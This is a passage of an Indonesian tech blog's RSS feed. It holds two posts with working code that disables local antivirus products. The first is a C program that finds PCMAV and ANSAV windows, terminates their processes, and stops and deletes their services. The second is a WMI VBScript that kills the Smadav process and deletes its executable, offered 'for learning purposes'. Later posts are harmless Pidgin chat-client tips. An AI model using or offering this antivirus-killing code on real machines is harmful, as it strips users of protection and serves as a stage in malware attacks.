  {"#32770", "$FS-2$"},                     /* FS-2 rtp */
  {"ansav#2194", "ANSAV - BETA"},           /* ansav */
}, victim;

void
unreg_svc()
{
  int i;
  SC_HANDLE hSvc1, hSvc2;
  SERVICE_STATUS svc_stat;
  const char *szsvc[] = {"PCMAVRTPService", "ANSAVDaemon"};

  for (i =0; i &lt; 2; i++)
  {
    if ((hSvc1 = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)) != NULL)
    {
      if ((hSvc2 = OpenService(hSvc1, szsvc[i], SERVICE_ALL_ACCESS)) != NULL)
      {
        ControlService(hSvc2, SERVICE_CONTROL_STOP, &#038;svc_stat);
        DeleteService(hSvc2);
        CloseServiceHandle(hSvc2);
      }
      CloseServiceHandle(hSvc1);
    }
  }
}

BOOL
CALLBACK enum_proc(HWND hwnd, LPARAM lpar)
{
  int i;
  DWORD dwpid;
  HANDLE hproc;
  static char szcls[50];
  static char szcap[50];

  GetClassName(hwnd, szcls, sizeof(szcls)-1);
  GetWindowText(hwnd, szcap, sizeof(szcap)-1);

  for (i = 0; i &lt; sizeof(targets)/sizeof(victim); i++)
  {
    if (strstr(targets[i].szcls, szcls) &#038;&#038; strstr(targets[i].szcap, szcap))
    {
      GetWindowThreadProcessId(hwnd, &#038;dwpid);
      if ((hproc = OpenProcess(PROCESS_TERMINATE, 0, dwpid)) != NULL)
      {
        TerminateProcess(hproc, 0);
        CloseHandle(hproc);
      }
      break;
    }
  }
  return 1;
}

void
main()
{
  __try {
    EnumWindows(enum_proc, 0);
    unreg_svc();
    MessageBox (NULL, "test antivirus lokal", "TKP", MB_OK | MB_ICONINFORMATION);
  }
  __except (EXCEPTION_EXECUTE_HANDLER) {
    ExitProcess(1);
  }
  ExitProcess(0);
}
</pre>
<ul class="related_post"><li><a href="http://xtremenitro.org/2010/06/20/seputar-registrasi-smadav.html" title="Seputar Registrasi Smadav">Seputar Registrasi Smadav</a></li><li><a href="http://xtremenitro.org/2010/06/06/decrypting-morphost-antivirus-database.html" title="Decrypting Morphost Antivirus Database">Decrypting Morphost Antivirus Database</a></li><li><a href="http://xtremenitro.org/2010/06/04/decrypting-smadav-loov-database.html" title="Decrypting Smadav Loov Database">Decrypting Smadav Loov Database</a></li><li><a href="http://xtremenitro.org/2010/03/24/mengenal-lebih-jauh-pcmav-v3-0.html" title="Mengenal Lebih Jauh PCMAV v3.0">Mengenal Lebih Jauh PCMAV v3.0</a></li><li><a href="http://xtremenitro.org/2009/01/18/maleoav-unofficial-review.html" title="MaleoAV Unofficial Review">MaleoAV Unofficial Review</a></li><li><a href="http://xtremenitro.org/2008/12/09/apa-perlu-os-linux-ada-antivirus.html" title="Apa perlu OS Linux ada AntiVirus ?">Apa perlu OS Linux ada AntiVirus ?</a></li><li><a href="http://xtremenitro.org/2008/12/04/ansav-for-linux-bsd-32-bit-beta.html" title="Ansav for Linux &#038; BSD 32-bit (beta)">Ansav for Linux &#038; BSD 32-bit (beta)</a></li><li><a href="http://xtremenitro.org/2008/11/30/daftar-mirror-repository-ubuntu-iix.html" title="Daftar Mirror Repository Ubuntu IIX">Daftar Mirror Repository Ubuntu IIX</a></li><li><a href="http://xtremenitro.org/2008/11/24/reversing-di-gnu-linux.html" title="Reversing di GNU/Linux">Reversing di GNU/Linux</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://xtremenitro.org/2010/06/02/iseng-test-antivirus-lokal.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Bermain-main Dengan WMI (Windows Management Instrumentation)</title>
		<link>http://xtremenitro.org/2010/05/29/bermain-main-dengan-wmi-windows-management-instrumentation.html</link>
		<comments>http://xtremenitro.org/2010/05/29/bermain-main-dengan-wmi-windows-management-instrumentation.html#comments</comments>
		<pubDate>Fri, 28 May 2010 17:03:50 +0000</pubDate>
		<dc:creator>drubicza</dc:creator>
				<category><![CDATA[Antivirus]]></category>
		<category><![CDATA[Programming & Scripting]]></category>
		<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://xtremenitro.org/?p=1688</guid>
		<description><![CDATA[Beberapa hari ini saya lagi tertarik dengan yang namanya WMI (Windows Management Instrumentation). Setelah ngubek2 MSDN dan googling sedikit, akhirnya ketemu beberapa referensi. Ok, langsung saja untuk percobaan kali ini, digunakan Windows® XP SP3. Jalankan WMI command line dengan memilih menu Start -> Run -> wmic. Ketika dijalankan pertama kali, wmic akan melakukan proses instalasi. [...]]]></description>
			<content:encoded><![CDATA[<p>Beberapa hari ini saya lagi tertarik dengan yang namanya WMI (Windows Management Instrumentation). Setelah  ngubek2 MSDN dan googling sedikit, akhirnya ketemu beberapa referensi. Ok, langsung saja untuk percobaan kali ini, digunakan Windows® XP SP3. Jalankan WMI command line dengan memilih menu <b>Start -> Run -> wmic</b>. Ketika dijalankan pertama kali, wmic akan melakukan proses instalasi. Nah, setelah berada pada prompt wmic, kita bisa menjalankan instruksi yang diinginkan. Contohnya seperti ini:</p>
<pre>
wmic:root\cli&gt;bios get name
Name
Phoenix ROM BIOS PLUS Version 1.10 A02

wmic:root\cli&gt;process where name="foobar2000.exe" get executablepath,processid
ExecutablePath                                         ProcessId
H:\Program Files\multimedia\foobar2000\foobar2000.exe  1544

wmic:root\cli&gt;
</pre>
<p>Untuk lebih jelasnya, beberapa class yang bisa digunakan bisa dibaca pada bagian referensi. Setelah bermain-main dengan wmic, tiba saatnya warm-up code. Untuk pengujian kali ini, kita akan menggunakan objek WMI untuk mematikan proses smadav dan bukan hanya itu, kita akan menghapus smadav *cough* untuk tujuan pembelajaran *cough*. Berikut ini kodenya:</p>
<pre>
set sysobj = createobject("scripting.filesystemobject")
set wmiobj = getobject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
set target = wmiobj.execquery("select * from win32_process where name='SM?RTP.exe'")

'-- matikan proses smadav (rtp dan scanner)
'-- dan simpan pathnya ke variabel fpath
for each victim in target
  fpath = victim.ExecutablePath
  victim.Terminate(0)
next

'-- istirahat sebentar dan hapus smadav
wscript.sleep 1000
if sysobj.fileexists(fpath) then sysobj.deletefile(fpath)
</pre>
<p>Ingat, kode di atas disimpan menggunakan format unicode soalnya nama smadav menggunakan unicode. ok, sekian dulu tutorial singkat kali ini. Terima kasih kepada: Tuhan Yang Maha Esa, TKP Crew and you <img src='http://xtremenitro.org/smilies/yahoo_wink.gif' alt='&#59;&#41;' class='wp-smiley' width='18' height='18' title='&#59;&#41;' /></p>
<p>referensi: <a href="http://anonym.to/http://msdn.microsoft.com/en-us/library/aa394084(v=VS.85).aspx">MSDN: WMI Win32 Classes</a></p>
<ul class="related_post"><li>No Related Post</li></ul>]]></content:encoded>
			<wfw:commentRss>http://xtremenitro.org/2010/05/29/bermain-main-dengan-wmi-windows-management-instrumentation.html/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Bermain fitur &#8216;Pounce Your Buddy&#8217; Pidgin</title>
		<link>http://xtremenitro.org/2010/05/28/bermain-fitur-pounce-your-buddy-pidgin.html</link>
		<comments>http://xtremenitro.org/2010/05/28/bermain-fitur-pounce-your-buddy-pidgin.html#comments</comments>
		<pubDate>Fri, 28 May 2010 04:57:12 +0000</pubDate>
		<dc:creator>NitrouZ</dc:creator>
				<category><![CDATA[Chat Client]]></category>
		<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://xtremenitro.org/?p=1682</guid>
		<description><![CDATA[Berbeda dengan fitur psychic pada pidgin, buddy pounce bukanlah merupakan plugin, melainkan fitur yang terdapat dalam core pidgin, artinya adalah fitur yang ada pada pidgin pada saat Anda melakukan default install. Fitur berfungsi untuk memberikan reply pada lawan bicara Anda tanpa harus Anda yang melakukannya. Reply dari buddy pounce bisa bermacam-macam, berikut contoh fitur dari [...]]]></description>
			<content:encoded><![CDATA[<p>Berbeda dengan <a href="http://xtremenitro.org/2010/05/28/fitur-psychic-pada-pidgin.html" target="_self"><strong>fitur psychic pada pidgin</strong></a>, buddy pounce bukanlah merupakan plugin, melainkan fitur yang terdapat dalam core pidgin, artinya adalah fitur yang ada pada pidgin pada saat Anda melakukan <em>default install</em>. Fitur berfungsi untuk memberikan reply pada lawan bicara Anda tanpa harus Anda yang melakukannya. Reply dari buddy pounce bisa bermacam-macam, berikut contoh fitur dari buddy pounce yang bisa di custom :</p>
<p>Sebagai contoh, saya melakukan setting supaya buddy pounce ini melakukan reply apabila orang lain sign in :</p>
<div id="attachment_1686" class="wp-caption aligncenter" style="width: 428px"><a href="http://xtremenitro.org/wp-content/uploads/2010/05/pounce.jpg" rel="thumbnail"><img class="size-large wp-image-1686" title="Pounce" src="http://xtremenitro.org/wp-content/uploads/2010/05/pounce-418x450.jpg" alt="Pounce" width="418" height="450" /></a><p class="wp-caption-text">Pounce</p></div>
<p>Caranya adalah, pilih account kita untuk melakukan pounce, kemudian masukkan username lawan chatting Anda yang ingin di pounce pada kolom <strong>Buddy name</strong>. Setelah itu, pastikan posisi <strong>Sign on</strong> ter-<em>check</em> pada category <em><strong>Pounce when buddy &#8230;</strong></em> kemudian posisi Open <strong>an IM Window</strong> dan <strong>Send a message</strong> ter-<em>check</em>. Tulis pesan Anda pada kotak kolom di bawahnya dan terakhir adalah tekan Add.</p>
<p>Untuk mencoba-nya, suruh lawan chatting Anda sign out terlebih dahulu, kemudian sign in lagi. Dan apa yang terjadi pada window chatting teman Anda ? <img src='http://xtremenitro.org/smilies/yahoo_bigsmile.gif' alt='&#58;&#68;' class='wp-smiley' width='18' height='18' title='&#58;&#68;' /> Selamat mencoba!</p>
<ul class="related_post"><li>No Related Post</li></ul>]]></content:encoded>
			<wfw:commentRss>http://xtremenitro.org/2010/05/28/bermain-fitur-pounce-your-buddy-pidgin.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fitur psychic pada pidgin</title>
		<link>http://xtremenitro.org/2010/05/28/fitur-psychic-pada-pidgin.html</link>
		<comments>http://xtremenitro.org/2010/05/28/fitur-psychic-pada-pidgin.html#comments</comments>
		<pubDate>Fri, 28 May 2010 04:35:34 +0000</pubDate>
		<dc:creator>NitrouZ</dc:creator>
				<category><![CDATA[Chat Client]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[pidgin]]></category>
		<category><![CDATA[psychic]]></category>
		<category><![CDATA[psychic pidgin]]></category>

		<guid isPermaLink="false">http://xtremenitro.org/?p=1683</guid>
		<description><![CDATA[Plugins ini seharusnya sudah ada sejak pidgin versi 2.x, bisa dilihat pada menu Tools &#124; Plugins atau CTRL + U : Fungsi dasar dari plugin psychic ini adalah untuk mendeteksi lawan chatting kita mengetik, namun sebelum lawan chatting kita selesai mengetik, kita telah mengetahui duluan bahwa kita sedang di ajak chatting. Cara pakainya, cukup aktifkan [...]]]></description>
			<content:encoded><![CDATA[<p>Plugins ini seharusnya sudah ada sejak pidgin versi 2.x, bisa dilihat pada menu Tools | Plugins atau CTRL + U :</p>
<div id="attachment_1684" class="wp-caption aligncenter" style="width: 363px"><a href="http://xtremenitro.org/wp-content/uploads/2010/05/psychic.jpg" rel="thumbnail"><img class="size-large wp-image-1684" title="Psychic" src="http://xtremenitro.org/wp-content/uploads/2010/05/psychic-353x450.jpg" alt="Psychic" width="353" height="450" /></a><p class="wp-caption-text">Psychic</p></div>
<p>Fungsi dasar dari plugin <em>psychic</em> ini adalah untuk mendeteksi lawan chatting kita mengetik, namun sebelum lawan chatting kita selesai mengetik, kita telah mengetahui duluan bahwa kita sedang di ajak chatting. Cara pakainya, cukup aktifkan saja plugin tersebut pada pidgin Anda. <img src='http://xtremenitro.org/smilies/yahoo_wink.gif' alt='&#59;&#41;' class='wp-smiley' width='18' height='18' title='&#59;&#41;' /></p>
<ul class="related_post"><li><a href="http://xtremenitro.org/2010/01/12/custom-smiley-pidgin.html" title="Custom Smiley Pidgin">Custom Smiley Pidgin</a></li><li><a href="http://xtremenitro.org/2009/01/17/pidgin-254-available.html" title="Pidgin 2.5.4 Available">Pidgin 2.5.4 Available</a></li><li><a href="http://xtremenitro.org/2008/12/22/pidgin-253-available.html" title="Pidgin 2.5.3 Available">Pidgin 2.5.3 Available</a></li><li><a href="http://xtremenitro.org/2008/12/18/masih-mau-menggunakan-yahoo-messenger.html" title="Masih mau menggunakan Yahoo! Messenger ?">Masih mau menggunakan Yahoo! Messenger ?</a></li><li><a href="http://xtremenitro.org/2008/12/17/kelemahan-reminder-password-pidgin.html" title="Kelemahan reminder password pidgin">Kelemahan reminder password pidgin</a></li><li><a href="http://xtremenitro.org/2008/12/09/chatting-facebook-via-pidgin.html" title="Chatting Facebook via Pidgin">Chatting Facebook via Pidgin</a></li><li><a href="http://xtremenitro.org/2008/12/09/irc-on-pidgin-bisakah.html" title="IRC on Pidgin, bisakah ?">IRC on Pidgin, bisakah ?</a></li><li><a href="http://xtremenitro.org/2008/12/07/fitur-penting-dalam-pidgin.html" title="Fitur penting dalam pidgin">Fitur penting dalam pidgin</a></li><li><a href="http://xtremenitro.org/2008/12/06/pidgin-yahoo-error.html" title="Pidgin-Yahoo! Error">Pidgin-Yahoo! Error</a></li><li><a href="http://xtremenitro.org/2008/12/03/menambahkan-auto-reply-di-pidgin.html" title="Menambahkan auto-reply di pidgin">Menambahkan auto-reply di pidgin</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://xtremenitro.org/2010/05/28/fitur-psychic-pada-pidgin.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fixing &#8216;flashing windows when IMs are received&#8217; at Pidgin 2.7</title>
		<link>http://xtremenitro.org/2010/05/19/fixing-flashing-windows-when-ims-are-received-at-pidgin-2-7.html</link>
		<comments>http://xtremenitro.org/2010/05/19/fixing-flashing-windows-when-ims-are-received-at-pidgin-2-7.html#comments</comments>
		<pubDate>Wed, 19 May 2010 04:46:05 +0000</pubDate>
		<dc:creator>NitrouZ</dc:creator>
				<category><![CDATA[Chat Client]]></category>
		<category><![CDATA[Software]]></category>
		<category><![CDATA[flashing wndow pidgin bug]]></category>
		<category><![CDATA[flasing window pidgin error]]></category>

		<guid isPermaLink="false">http://xtremenitro.org/?p=1677</guid>
		<description><![CDATA[Setelah melakukan upgrade dari pidgin 2.6.6 ke pidgin 2.7.0, saya mendapatkan sedikit keanehan (walaupun pada awalnya ga nyadar). Upgrade yang cukup lancar, sehingga melupakan saya bahwa ada salah satu fitur dari Pidgin yang tidak aktif (padahal fungsinya sudah saya aktifkan pada Preferences). Sebenarnya fungsi ini tidak begitu penting bagi Anda yang sering di depan komputer, [...]]]></description>
			<content:encoded><![CDATA[<p>Setelah melakukan upgrade dari <a href="http://developer.pidgin.im/wiki/ChangeLog#version2.6.602182010">pidgin 2.6.6</a> ke <a href="http://developer.pidgin.im/wiki/ChangeLog#version2.7.005122010" target="_blank">pidgin 2.7.0</a>, saya mendapatkan sedikit keanehan <del datetime="2010-05-19T03:59:30+00:00">(walaupun pada awalnya ga nyadar)</del>. Upgrade yang cukup lancar, sehingga melupakan saya bahwa ada salah satu fitur dari Pidgin yang tidak aktif (padahal fungsinya sudah saya aktifkan pada Preferences).</p>
<p>Sebenarnya fungsi ini tidak begitu penting bagi Anda yang sering di depan komputer, namun fungsi ini cukup mengganggu apabila tidak diaktifkan (apalagi bagi saya yang sering <em>lompat-lompat</em> PC dan sering idle). Fungsi ini adalah untuk memberikan notifikasi bahwa ada pesan yang belum terbaca, pada messenger Anda.</p>
<div id="attachment_1678" class="wp-caption aligncenter" style="width: 451px"><a href="http://xtremenitro.org/wp-content/uploads/2010/05/flash_window.jpg" rel="thumbnail"><img class="size-large wp-image-1678" title="Conversation Preferences" src="http://xtremenitro.org/wp-content/uploads/2010/05/flash_window-441x450.jpg" alt="Conversation Preferences" width="441" height="450" /></a><p class="wp-caption-text">Conversation Preferences</p></div>
<p>Karena saat saya menulis post ini belum ada release baru dari developer pidgin secara official, maka berikut patch <strong>pidgin.dll</strong> dari <a href="http://developer.pidgin.im/query?owner=datallah" target="_blank">member datallah</a> (<a href="http://developer.pidgin.im/ticket/11842" target="_blank">related tickets</a>). Silakan download patchnya di <a href="http://pidgin.im/~datallah/pidgin.dll" target="_blank"><strong>sini</strong></a>, sebelum apply patch baru, ada baiknya Anda melakukan backup file <strong>pidgin.dll </strong>pada folder instalasi Pidgin. Setelah melakukan backup, replace file <strong>pidgin.dll</strong> dari default instalasi Pidgin 2.7 dengan patch di atas.</p>
<div id="attachment_1679" class="wp-caption aligncenter" style="width: 460px"><a href="http://xtremenitro.org/wp-content/uploads/2010/05/pidgin.dll_.patch.jpg" rel="thumbnail"><img class="size-large wp-image-1679" title="pidgin.dll.patch" src="http://xtremenitro.org/wp-content/uploads/2010/05/pidgin.dll_.patch-450x32.jpg" alt="pidgin.dll.patch" width="450" height="32" /></a><p class="wp-caption-text">pidgin.dll.patch</p></div>
<p>Jikalau nanti release terbaru sudah muncul, maka upgrade-lah pidgin Anda <img src='http://xtremenitro.org/smilies/yahoo_smiley.gif' alt='&#58;&#41;' class='wp-smiley' width='18' height='18' title='&#58;&#41;' /> Enjoy</p>
<ul class="related_post"><li>No Related Post</li></ul>]]></content:encoded>
			<wfw:commentRss>http://xtremenitro.org/2010/05/19/fixing-flashing-windows-when-ims-are-received-at-pidgin-2-7.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
